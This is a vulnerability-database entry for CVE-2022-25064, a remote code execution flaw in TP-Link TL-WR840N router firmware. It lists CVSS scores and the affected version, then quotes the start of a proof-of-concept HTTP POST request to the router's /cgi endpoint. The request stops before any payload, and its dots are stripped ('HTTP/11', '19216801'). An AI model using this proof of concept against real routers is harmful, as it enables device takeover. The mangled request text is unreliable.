7.5
CVSSv2

CVE-2022-25064

Published: 25/02/2022 Updated: 08/08/2023
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 668
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

TP-LINK TL-WR840N(ES)_V6.20_180709 exists to contain a remote code execution (RCE) vulnerability via the function oal_wan6_setIpAddr.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

tp-link tl-wr840n_firmware 6.20_180709

Github Repositories

CVE-2022-25064 TP-LINK TL-WR840N RCE via the function oal_wan6_setIpAddr POC POST /cgi?2&2&2 HTTP/11 Host: 19216801 User-Agent: Mozilla/50 (Macintosh; Intel Mac OS X 1015; rv:950) Gecko/20100101 Firefox/950 Accept: */* Accept-Language: es-ES,es;q=08,en-US;q=05,en;q=03 Accept-Encoding: gzip, deflate Content-Type: text/plain Content-Length: 617 Origin